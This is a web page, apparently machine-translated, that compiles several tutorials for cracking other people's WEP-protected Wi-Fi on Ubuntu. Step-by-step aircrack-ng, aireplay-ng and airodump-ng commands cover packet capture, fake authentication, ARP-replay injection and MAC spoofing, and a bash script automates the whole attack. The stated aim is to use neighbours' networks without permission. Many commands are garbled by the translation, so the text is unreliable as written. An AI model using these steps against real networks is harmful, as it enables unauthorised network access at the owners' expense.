Use Ubuntu to crack wep wireless encryption

Source: Internet
Author: User
Tags unsupported bssid

Use Ubuntu to crack wep wireless encryption I. Install ubuntu and aircrack-ng
First install the latest Ubuntu version and update the system to the latest version.
Enter sudo apt-get install aircrack-ng in the terminal to install aircrack-ng.
If you are not connected to the Internet, go to another computer and download the aircrack-ng Ubuntu DEB installation package.

Ii. Cracking Process
1. start the monitoring mode of the wireless network card. Enter sudo airmon-ng start wlan0 in the terminal.
(Wlan0 is the port of the wireless network card. You can enter ifconfig in the terminal to view the port)

2. View Wireless AP input in the terminal:
Sudo airodump-ng mon0
(Note: After the monitoring mode is enabled, the wireless network port is now mon0 !!!)
Check which wep-encrypted AP is online, press ctrl + c to exit, and keep the terminal

3. packet capture
Open another terminal and enter:
Sudo airodump-ng-c 6 -- bssid AP's MAC-w wep mon0
(6 followed by-c is the AP working channel to be cracked, and the AP's MAC address followed by bissid is the MAC address of the AP to be cracked, -w is followed by wep, which is the file name for storing captured DATA packets. Change the channel and MAC address based on the online AP in step 2. The file name for storing DATA can be named as needed)

4. Establish a virtual connection with the AP
Open another terminal and enter:
Sudo aireplay-ng-1 0-a AP's MAC-h My MAC mon0
(My MAC following-h is the MAC address of your wireless network card)

5. Inject
After a virtual connection is established, enter:
Sudo aireplay-ng-2-F-p 0841-c ff: ff-B AP's MAC-h My MAC mon0
Now let's look back at whether the terminal in step 3 is starting to soar!

6. decryption
After collecting more than 5000 pieces of DATA, open another terminal and enter:
Sudo aircrack-ng wep *. cap
Decryption
(If not, continue. aircrack-ng will automatically run after each additional 5000 DATA entries until the calculated password is reached)

7. Close
After the password is cracked, enter sudo airmon-ng stop mon0 in the terminal to disable the monitoring mode. Otherwise, the wireless network adapter will continue injecting the password to the AP, you cannot exit or directly close the terminal by using ctrl + c. Now you can surf, or repeat 1-7 to crack other APs. When you are surfing, do not be too aggressive. Otherwise, it is not good to throw the host.

//////////////////////////////////////// ///////////
Use Ubuntu to crack the WEP Key

After reading this article, anyone can install and run Linux and crack the WEP Key. I spent a total of two days and read a lot of materials to make this thing. Now I want to share it with you.

After reading this article, anyone can install and run Linux and crack the WEP Key. I spent a total of two days and read a lot of materials to make this thing. Now I want to share it with you. I am not an expert in Linux. All you need is an old laptop with a wireless network card and a copy of Ubuntu Linux. This is one of the most popular and easy-to-install Linux releases.

The first step is to install Ubuntu. Start from CD and follow the instructions. This is very simple. It should be noted that each of the following steps should be carried out in an orderly manner; otherwise, the expected goal will not be reached.

The next step is to install other programs. First, make sure that you can connect to the Internet. To install other programs, open a terminal window and enter the following code:

Sudo cp/etc/apt/sources. list/etc/apt/sources. list_backup

Sudo gedit/etc/apt/sources. list
 

In the editor, use the following code to replace other things:

# Add comments (#) in front of any line to remove it from being checked.
# Use the following sources. list at your own risk.

Http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

The deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

# Major bug fix updates produced after the final release

Dapper-updates main restricted universe multiverse

Deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

# UBUNTU SECURITY UPDATES

Deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

Deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

# Backports repository (Unsupported. May contain illegal packages. Use at own risk .)

Dapper-backports main restricted universe multiverse

Deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

# Plf repository (Unsupported. May contain illegal packages. Use at own risk .)

Deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free

Deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
 

Save the file and exit the editor. Run the following command:

Sudo apt-get update

Now we can install the packages that will be used later:

Sudo apt-get install build-essential

Sudo apt-get install aircrack

Sudo apt-get install kismet

Sudo apt-get install airsnort

Sudo apt-get install linux-source

Sudo apt-get install linux-headers

Sudo apt-get install sharutils
 

Next, you should Update the entire system by entering the system menu> Administration> Update Manager. Click "Check" to start installation and update. Then restart the system. Patch the Madwifi driver.

This location may be a bit complicated. Linksys WPC55AG uses the Atheros driver. I need to patch it. If your driver is different from mine, you need to study whether you need to patch the driver and whether you can even work with the Aircrack suite. The Aircrack-ng.org forum is a good place to test, of course, google search is also. If your Nic is also set to Atheros, we call it ath0, then if you type iwconfig in the terminal window, a line of characters will appear, indicating that the Ethernet controller is set to Atheros Communications ......

Let's patch it. When you find the old hard drive, it will temporarily make your wireless network card unable to work. First, go to the/usr/src directory, download the new driver, delete the old driver, install the new driver, and install patches. You can copy and paste the following code to the terminal:

Sudo-I
Cd/usr/src

Wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz

Wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

Ifconfig ath0 down

Rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal

Find/lib/modules-name 'ath * '-exec rm-v {}\;

Find/lib/modules-name 'wlan * '-exec rm-v {}\;

Tar zxvf madwifi-cvs-20051025.tar.gz

Cd madwifi

Patch-Np1-I ../madwifi-cvs-20051025.patch

Make & make install

Modprobe ath_pci
 

If you are using the Atheros driver, we will need to configure kismet later. If you are using other drivers, you must look at the syntax you are using. First, enter the Kismet configuration, and then change the source code line.

Sudo gedit/etc/kismet. conf

Change the code line starting with "source =" to "source = madwifi_ag, ath0, madwifi" and restart the computer. After restarting, you can access the Internet through a wireless network card.

Now let's start cracking. Open a terminal window, enter monitoring mode, and run ksimet.

Sudo airmon start ath0

Sudo kismet
 

Find the wireless network you want to crack, pay attention to its ESSID and channel, and then press Ctrl-C to exit.

Run airodump.

Sudo airodump ath0 filename channel #1

The file name is whatever you want. It can exist in your home directory as an ivs file or in any directory where you run the command.

Copy the bssid of the wireless network from the airodump. The specific method is to press Shift + Ctrl + C. Open a new terminal window so that we can run aireplay and start to inject data packets, resulting in an increase in data volume. We want the data column in airodump to be displayed between 0.1 million and 0.4 million. The more data packets, the faster the aircrack can find the WEP Key. If the WEP Key is 128 bits, we may need up to 1 million packets.

Sudo aireplay-1 0-e ESSID-a BSSID-h 0: 1: 2: 3: 4: 5 ath0

Connect the network with the wireless connection. If it always times out, you need to be closer to the wireless router, or change the interface speed through "sudo iwconfig ath0 rate 1 Mbit/s.

Next we want to start injecting data packets.

Sudo aireplay-3-B BSSID-h 0: 1: 2: 3: 4: 5 ath0

At first, it only reads data packets, reports 0 ARP requests, and sends 0 data packets. It takes only one or two minutes to start sending a large number of packets. If the returned text is reported to have been weakened, press Ctrl + C and run the command again. You can press the following command to accelerate everything:

Sudo aireplay-0 ath0-a BSSID ath0

Otherwise, just wait for the task to proceed. As data packets start to be sent, the data bar in the Airodump starts to soar. Wait until you receive the expected number of data packets, open a new terminal window, and run aircrack.

Sudo aircrack filename. ivs

One minute later, aircrack should return the WEP Key. If no response is returned, more data packets will be recycled.

This is not difficult to do, but it can work.

 

Wep password cracking script in ubuntu

#! /Bin/bash
# Ubuntu WEP password cracking version 2.0
MY_MAC =$ (set $ (ifconfig | grep "wlan0") & echo $5)
AP_MAC = ff: ff
Yn = y
# Preparation area
If [! -F/usr/sbin/airmon-ng]; then
Sudo apt-get install aircrack-ng
Fi
# Cracking Zone
While ["$ yn" = "y"]
Do
Echo "enable the monitoring mode of the wireless network card"
Sudo airmon-ng start wlan0
Read-p "view available AP. Press ctrl + c when it is ready. Press enter first." tmp
Sudo airodump-ng mon0
Trap "echo continue" INT
Read-p "MAC address of the AP to be cracked:" AP_MAC
Read-p "channels used (6 by default):" tmp
CHANNEL =$ {tmp:-6}
Read-p "temporary file name (wep by default):" tmp
FILE =$ {tmp:-wep}
Gnome-terminal-e "sudo airodump-ng-c" $ CHANNEL "-- bssid" $ AP_MAC "-w" $ FILE "mon0"
Echo "establishing virtual connection with AP"
Sudo aireplay-ng-1 0-a "$ AP_MAC"-h "$ MY_MAC" mon0
Echo "inject"
Gnome-terminal-e "sudo aireplay-ng-2-F-p 0841-c ff: ff-B "$ AP_MAC"-h "$ MY_MAC" mon0"
Read-p "Please press enter to start cracking after DATA reaches 5000" tmp
Sudo aircrack-ng "$ FILE" *. cap
Echo "clearing the battlefield"
Rm "$ FILE "*
Read-p "continue? "Tmp
Case tmp in
[YY] | [yY] [eE] [sS]) yn = y ;;
[NN] *) yn = n ;;
*) Exit 0 ;;
Esac
Done
Sudo airmon-ng stop mon0

Crack wep wireless password in ubuntu (classification: linux)
This is a matter of walking on the verge of morality. So I would like to say that we are studying it from the perspective of research and study ....

I. software and hardware environment

1. At least you have to have a local or desktop with a wireless network card, right?

2. RT. Do you have to install the same ubuntu system as me? If you have not installed it or are not planning to install it, don't read it.

3. install the aircrack-ng package through the new software manager or apt-get install (you will be prompted to install the iw package together ).

Ii. Cracking Process:

1. Open the first shell window, enter ifconfig-a to view your wireless network card, and display it as wlan0. copy and paste the mac address to a document, which will be used later.

2. Enable the wireless Nic. Input ifconfig wlan0 up

Enter airmon-ng start wlan0 11 to enable listening for Channel 6, or enter airmon-ng start wlan0 to enable listening for all channels. Of course, if you want to crack the wireless rechannel n, you can replace 6 with the corresponding value n.

3. Input airodump-ng -- ivs-w name-c 11 mon0 to intercept the data packet. Name is the name of the file generated by the captured package. We can use name as an example. 11 is the channel, which is also replaced by the value corresponding to the channel where you want to crack the wireless network. After you press enter to confirm, find the BSSID corresponding to the wireless connection, that is, the MAC of the AP in the shell that appears, and copy or record it to the document, which will be used later.

7. create a virtual connection: In the second shell window, enter aireplay-ng-1 0-a <target ap mac>-h <your ubs mac> mon0, when a smiling face appears, the connection is successful. I used the copied mac just now, right? Haha!
(This step is critical. If it doesn't work, try multiple times. It is helpful to enter iwconfig mon0 rate 2 M to reduce the transmission speed)

8. aireplay-ng-2-p 0841-c ffffffffffff-B <target AP MAC>-h <your wireless Nic MAC> mon0 for interactive attacks. If Y is entered for confirmation

9. wait patiently until the number of data in the first shell window is increased to more than 15 thousand. If the signal is good, you can watch TV if the signal is normal...

10. In the third shell window, enter aircrack-ng-n 64-B <target AP MAC> name *. ivs. Here 64 means that the wireless password you cracked is 64-bit encrypted. If the password is not successfully cracked, change it to 128-bit and try again. It should be OK!

11. If it succeeds, the Key will be available immediately.

 

Finally, we hope that our friends who wish to use wireless networks will be able to have a bit of public morality, send and receive emails, use QQ, and top up multiple webpages, do not watch online videos or download things. do not affect the normal use of wireless masters!

Without a client wireless WEP encryption and cracking in Ubuntu

Here, I will use a USB Nic as an example. We can see that there is a NIC named rausb0. The status is not loaded. Do not load it here. First, change the MAC address to any MAC address that needs to be forged,

Input macchanger-m 00: 11: 22: 33: 44: 55 rausb0

-M is followed by the MAC to be forged, and then the name of the NIC to be modified. Here we change the MAC of the USB Nic to 00: 11: 22: 33: 44: 55.
Then load the NIC and enter:

Ifconfig-a rausb0 up to load the usb nic Driver
Then, we can use tools such as Kismet and Airosnort to scan the AP of the current wireless network,

Then, we need to activate the NIC to the monitor mode for subsequent cracking. The command is as follows:

Airmon-ng start rausb0 3. Here, this 3 is the channel of the AP we found, and then enter the following command to start packet capture.
Airodump-ng-w test. cap -- channel 3 rausb0. Here test. cap is the packet capture file name I set.

FakeAuth attacks can be initiated. These attacks are used when the AP of the Wireless Access Point has no Client activity or even no Client. The command is as follows:
Aireplay-ng-1 1-e AP's ESSID-a AP's MAC-h FakeMAC rausb0
Here-1 refers to the use of FakeAuth attack mode, followed by latency;-e followed by ap essid,-a followed by ap mac, -h is followed by a previously forged MAC, followed by a wireless Nic.

At the same time, to obtain the IVs (initialization vector), ArpRequest injection attacks must be carried out. This is very important and can effectively increase the number of captured packets and the cracking speed. The command is as follows:
Aireplay-ng-3-B AP's MAC-h Client's MAC-x 1024 rausb0
-3 refers to the ArpRequest injection attack.-B follows the MAC address of the AP to be intruded, and-h is followed by the MAC address of the monitored client, here we use the forged client MAC, as shown in, as-x 1024 refers to the number of packets sent per second. This value can be smaller, but the maximum value is 1024, here I use the default, and finally specify the USB wireless network card. Next, you can enable aircrack-ng synchronously to crack the problem. The command is as follows:

Aircrack-ng-x-f 2 test-01.cap here-x is the brute force cracking mode,-f refers to the Enable Password Complexity of 2, followed by the packet capture file we saved instantly,
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.